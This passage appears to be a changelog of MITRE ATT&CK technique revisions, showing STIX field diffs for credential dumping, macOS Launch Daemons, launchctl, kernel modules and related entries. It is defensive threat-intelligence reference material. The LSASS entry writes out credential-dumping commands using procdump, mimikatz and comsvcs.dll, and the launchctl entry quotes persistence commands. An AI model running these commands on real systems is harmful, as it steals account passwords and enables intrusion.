 >l](https://attack.mitre.org/techniques/T1021/003) to facilit
 >ate remote IPC execution.(Citation: Fireeye Hunting COM June
 > 2019)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 19:34:47.546000+00:002021-10-15 19:48:30.432000+00:00
descriptionAdversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms.Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Fireeye Hunting COM June 2019', 'description': 'Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html'}
x_mitre_platformsmacOS

[T1059.007] Command and Scripting Interpreter: JavaScript

Current version: 2.1

Version changed from: 2.0 → 2.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:21:05.521000+00:002021-08-16 21:02:05.142000+00:00
x_mitre_version2.02.1

[T1547.006] Boot or Logon Autostart Execution: Kernel Modules and Extensions

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-30 00:59:53.716000+00:002021-10-19 04:03:46.357000+00:00
x_mitre_detectionLoading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) On macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'User Approved Kernel Extension Pike’s', 'description': 'Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.', 'url': 'https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/'}
external_references{'source_name': 'Purves Kextpocalypse 2', 'description': 'Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.', 'url': 'https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/'}
external_references{'source_name': 'Apple Developer Configuration Profile', 'description': 'Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.', 'url': 'https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf'}
x_mitre_data_sourcesFile: File Modification

[T1003.001] OS Credential Dumping: LSASS Memory

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to access credential material storedt1Adversaries may attempt to access credential material stored
> in the process memory of the Local Security Authority Subsy> in the process memory of the Local Security Authority Subsy
>stem Service (LSASS). After a user logs on, the system gener>stem Service (LSASS). After a user logs on, the system gener
>ates and stores a variety of credential materials in LSASS p>ates and stores a variety of credential materials in LSASS p
>rocess memory. These credential materials can be harvested b>rocess memory. These credential materials can be harvested b
>y an administrative user or SYSTEM and used to conduct [Late>y an administrative user or SYSTEM and used to conduct [Late
>ral Movement](https://attack.mitre.org/tactics/TA0008) using>ral Movement](https://attack.mitre.org/tactics/TA0008) using
> [Use Alternate Authentication Material](https://attack.mitr> [Use Alternate Authentication Material](https://attack.mitr
>e.org/techniques/T1550).  As well as in-memory techniques, t>e.org/techniques/T1550).  As well as in-memory techniques, t
>he LSASS process memory can be dumped from the target host a>he LSASS process memory can be dumped from the target host a
>nd analyzed on a local system.  For example, on the target h>nd analyzed on a local system.  For example, on the target h
>ost use procdump:  * <code>procdump -ma lsass.exe lsass_dump>ost use procdump:  * <code>procdump -ma lsass.exe lsass_dump
></code>  Locally, mimikatz can be run using:  * <code>sekurl></code>  Locally, mimikatz can be run using:  * <code>sekurl
>sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas>sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas
>swords</code>   Windows Security Support Provider (SSP) DLLs>swords</code>  Built-in Windows tools such as comsvcs.dll ca
> are loaded into LSSAS process at system start. Once loaded >n also be used:  * <code>rundll32.exe C:\Windows\System32\co
>into the LSA, SSP DLLs have access to encrypted and plaintex>msvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Vole
>t passwords that are stored in Windows, such as any logged-o>xity Exchange Marauder March 2021)(Citation: Symantec Attack
>n user's Domain password or smart card PINs. The SSP configu>s Against Government Sector)   Windows Security Support Prov
>ration is stored in two Registry keys: <code>HKLM\SYSTEM\Cur>ider (SSP) DLLs are loaded into LSSAS process at system star
>rentControlSet\Control\Lsa\Security Packages</code> and <cod>t. Once loaded into the LSA, SSP DLLs have access to encrypt
>e>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Securit>ed and plaintext passwords that are stored in Windows, such 
>y Packages</code>. An adversary may modify these Registry ke>as any logged-on user's Domain password or smart card PINs. 
>ys to add new SSPs, which will be loaded the next time the s>The SSP configuration is stored in two Registry keys: <code>
>ystem boots, or when the AddSecurityPackage Windows API func>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages<
>tion is called.(Citation: Graeber 2014)  The following SSPs >/code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\O
>can be used to access credentials:  * Msv: Interactive logon>SConfig\Security Packages</code>. An adversary may modify th
>s, batch logons, and service logons are done through the MSV>ese Registry keys to add new SSPs, which will be loaded the 
> authentication package. * Wdigest: The Digest Authenticatio>next time the system boots, or when the AddSecurityPackage W
>n protocol is designed for use with Hypertext Transfer Proto>indows API function is called.(Citation: Graeber 2014)  The 
>col (HTTP) and Simple Authentication Security Layer (SASL) e>following SSPs can be used to access credentials:  * Msv: In
>xchanges.(Citation: TechNet Blogs Credential Protection) * K>teractive logons, batch logons, and service logons are done 
>erberos: Preferred for mutual client-server domain authentic>through the MSV authentication package. * Wdigest: The Diges
>ation in Windows 2000 and later. * CredSSP:  Provides SSO an>t Authentication protocol is designed for use with Hypertext
>d Network Level Authentication for Remote Desktop Services.(> Transfer Protocol (HTTP) and Simple Authentication Security
>Citation: TechNet Blogs Credential Protection) > Layer (SASL) exchanges.(Citation: TechNet Blogs Credential 
 >Protection) * Kerberos: Preferred for mutual client-server d
 >omain authentication in Windows 2000 and later. * CredSSP:  
 >Provides SSO and Network Level Authentication for Remote Des
 >ktop Services.(Citation: TechNet Blogs Credential Protection
 >

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-09 20:46:00.393000+00:002021-10-15 19:55:01.368000+00:00
descriptionAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: * rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
external_references[1]['source_name']Graeber 2014Volexity Exchange Marauder March 2021
external_references[1]['description']Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.
external_references[1]['url']http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.htmlhttps://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
external_references[2]['source_name']TechNet Blogs Credential ProtectionSymantec Attacks Against Government Sector
external_references[2]['description']Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.
external_references[2]['url']https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf
external_references[3]['source_name']Medium Detecting Attempts to Steal Passwords from MemoryGraeber 2014
external_references[3]['description']French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.
external_references[3]['url']https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4eahttp://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
external_references[4]['source_name']PowersploitTechNet Blogs Credential Protection
external_references[4]['description']PowerSploit. (n.d.). Retrieved December 4, 2014.Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.
external_references[4]['url']https://github.com/mattifestation/PowerSploithttps://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Medium Detecting Attempts to Steal Passwords from Memory', 'description': 'French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea'}
external_references{'source_name': 'Powersploit', 'description': 'PowerSploit. (n.d.). Retrieved December 4, 2014.', 'url': 'https://github.com/mattifestation/PowerSploit'}
x_mitre_contributorsEdward Millington

[T1570] Lateral Tool Transfer

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 22:10:10.862000+00:002021-09-28 21:17:42.490000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Share: Network Share Access
x_mitre_data_sourcesNamed Pipe: Named Pipe Metadata

[T1543.004] Create or Modify System Process: Launch Daemon

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may create or modify launch daemons to repeatedlt1Adversaries may create or modify Launch Daemons to execute m
>y execute malicious payloads as part of persistence. Per App>alicious payloads as part of persistence. Launch Daemons are
>le’s developer documentation, when macOS and OS X boot up, l> plist files used to interact with Launchd, the service mana
>aunchd is run to finish system initialization. This process >gement framework used by macOS. Launch Daemons require eleva
>loads the parameters for each launch-on-demand system-level >ted privileges to install, are executed for every user on a 
>daemon from the property list (plist) files found in <code>/>system prior to login, and run in the background without the
>System/Library/LaunchDaemons</code> and <code>/Library/Launc> need for user interaction. During the macOS initialization 
>hDaemons</code> (Citation: AppleDocs Launch Agent Daemons). >startup, the launchd process loads the parameters for launch
>These LaunchDaemons have property list files which point to >-on-demand system-level daemons from plist files found in <c
>the executables that will be launched (Citation: Methods of >ode>/System/Library/LaunchDaemons/</code> and <code>/Library
>Mac Malware Persistence).   Adversaries may install a new la>/LaunchDaemons/</code>. Required Launch Daemons parameters i
>unch daemon that can be configured to execute at startup by >nclude a <code>Label</code> to identify the task, <code>Prog
>using launchd or launchctl to load a plist into the appropri>ram</code> to provide a path to the executable, and <code>Ru
>ate directories  (Citation: OSX Malware Detection). The daem>nAtLoad</code> to specify when the task is run. Launch Daemo
>on name may be disguised by using a name from a related oper>ns are often used to provide access to shared resources, upd
>ating system or benign software (Citation: WireLurker). Laun>ates to software, or conduct automation tasks.(Citation: App
>ch Daemons may be created with administrator privileges, but>leDocs Launch Agent Daemons)(Citation: Methods of Mac Malwar
> are executed under root privileges, so an adversary may als>e Persistence)(Citation: launchd Keywords for plists)  Adver
>o use a service to escalate privileges from administrator to>saries may install a Launch Daemon configured to execute at 
> root.   The plist file permissions must be root:wheel, but >startup by using the <code>RunAtLoad</code> parameter set to
>the script or program that it points to has no such requirem> <code>true</code> and the <code>Program</code> parameter se
>ent. So, it is possible for poor configurations to allow an >t to the malicious executable path. The daemon name may be d
>adversary to modify a current Launch Daemon’s executable and>isguised by using a name from a related operating system or 
> gain persistence or Privilege Escalation. >benign software (i.e. [Masquerading](https://attack.mitre.or
 >g/techniques/T1036)). When the Launch Daemon is executed, th
 >e program inherits administrative permissions.(Citation: Wir
 >eLurker)(Citation: OSX Malware Detection)  Additionally, sys
 >tem configuration changes (such as the installation of third
 > party package managing software) may cause folders such as 
 ><code>usr/local/bin</code> to become globally writeable. So,
 > it is possible for poor configurations to allow an adversar
 >y to modify executables referenced by current Launch Daemon'
 >s plist files.(Citation: LaunchDaemon Hijacking)(Citation: s
 >entinelone macos persist Jun 2019)

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 15:46:44.130000+00:002021-10-07 22:10:55.653000+00:00
descriptionAdversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation. Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists) Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection) Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)
external_references[5]['source_name']OSX Malware Detectionlaunchd Keywords for plists
external_references[5]['description']Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.
external_references[5]['url']https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdfhttps://www.real-world-systems.com/docs/launchdPlist.1.html
x_mitre_detectionMonitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP. Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'OSX Malware Detection', 'description': "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", 'url': 'https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf'}
external_references{'source_name': 'LaunchDaemon Hijacking', 'description': 'Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.', 'url': 'https://bradleyjkemp.dev/post/launchdaemon-hijacking/'}
external_references{'source_name': 'sentinelone macos persist Jun 2019', 'description': 'Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.', 'url': 'https://www.sentinelone.com/blog/how-malware-persists-on-macos/'}
x_mitre_effective_permissionsAdministrator

[T1569.001] System Services: Launchctl

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse launchctl to execute commands or progrt1Adversaries may abuse launchctl to execute commands or progr
>ams. Launchctl controls the macOS launchd process, which han>ams. Launchctl interfaces with launchd, the service manageme
>dles things like [Launch Agent](https://attack.mitre.org/tec>nt framework for macOS. Launchctl supports taking subcommand
>hniques/T1543/001)s and [Launch Daemon](https://attack.mitre>s on the command-line, interactively, or even redirected fro
>.org/techniques/T1543/004)s, but can execute other commands >m standard input.(Citation: Launchctl Man)  Adversaries use 
>or programs itself. Launchctl supports taking subcommands on>launchctl to execute commands and programs as [Launch Agent]
> the command-line, interactively, or even redirected from st>(https://attack.mitre.org/techniques/T1543/001)s or [Launch 
>andard input.(Citation: Launchctl Man)  By loading or reload>Daemon](https://attack.mitre.org/techniques/T1543/004)s. Com
>ing [Launch Agent](https://attack.mitre.org/techniques/T1543>mon subcommands include: <code>launchctl load</code>,<code>l
>/001)s or [Launch Daemon](https://attack.mitre.org/technique>aunchctl unload</code>, and <code>launchctl start</code>. Ad
>s/T1543/004)s, adversaries can install persistence or execut>versaries can use scripts or manually run the commands <code
>e changes they made.(Citation: Sofacy Komplex Trojan)  Runni>>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <c
>ng a command from launchctl is as simple as <code>launchctl >ode>/bin/launchctl load</code> to execute [Launch Agent](htt
>submit -l <labelName> -- /Path/to/thing/to/execute "arg" "ar>ps://attack.mitre.org/techniques/T1543/001)s or [Launch Daem
>g" "arg"</code>. Adversaries can abuse this functionality to>on](https://attack.mitre.org/techniques/T1543/004)s.(Citatio
> execute code or even bypass application control if launchct>n: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools an
>l is an allowed process.>d Techniques) 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-06-08 23:28:29.079000+00:002021-10-15 18:40:23.141000+00:00
descriptionAdversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man) By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan) Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man) Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w "%s/Library/LaunchAgents/%s" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
x_mitre_detectionKnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. Monitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. When removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': '20 macOS Common Tools and Techniques', 'description': 'Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.', 'url': 'https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/'}

[T1608.005] Stage Capabilities: Link Target

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 17:53:29.106000+00:002021-10-17 16:28:41.565000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).
x_mitre_version1.01.1

[T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify file or directory permissions/attribut1Adversaries may modify file or directory permissions/attribu
>tes to evade access control lists (ACLs) and access protecte>tes to evade access control lists (ACLs) and access protecte
>d files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citati>d files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citati
>on: Hybrid Analysis Icacls2 May 2018) File and directory per>on: Hybrid Analysis Icacls2 May 2018) File and directory per
>missions are commonly managed by ACLs configured by the file>missions are commonly managed by ACLs configured by the file
> or directory owner, or users with the appropriate permissio> or directory owner, or users with the appropriate permissio
>ns. File and directory ACL implementations vary by platform,>ns. File and directory ACL implementations vary by platform,
> but generally explicitly designate which users or groups ca> but generally explicitly designate which users or groups ca
>n perform which actions (read, write, execute, etc.).  Most >n perform which actions (read, write, execute, etc.).  Most 
>Linux and Linux-based platforms provide a standard set of pe>Linux and Linux-based platforms provide a standard set of pe
>rmission groups (user, group, and other) and a standard set >rmission groups (user, group, and other) and a standard set 
>of permissions (read, write, and execute) that are applied t>of permissions (read, write, and execute) that are applied t
>o each group. While nuances of each platform’s permissions i>o each group. While nuances of each platform’s permissions i
>mplementation may vary, most of the platforms provide two pr>mplementation may vary, most of the platforms provide two pr
>imary commands used to manipulate file and directory ACLs: <>imary commands used to manipulate file and directory ACLs: <
>code>chown</code> (short for change owner), and <code>chmod<>code>chown</code> (short for change owner), and <code>chmod<
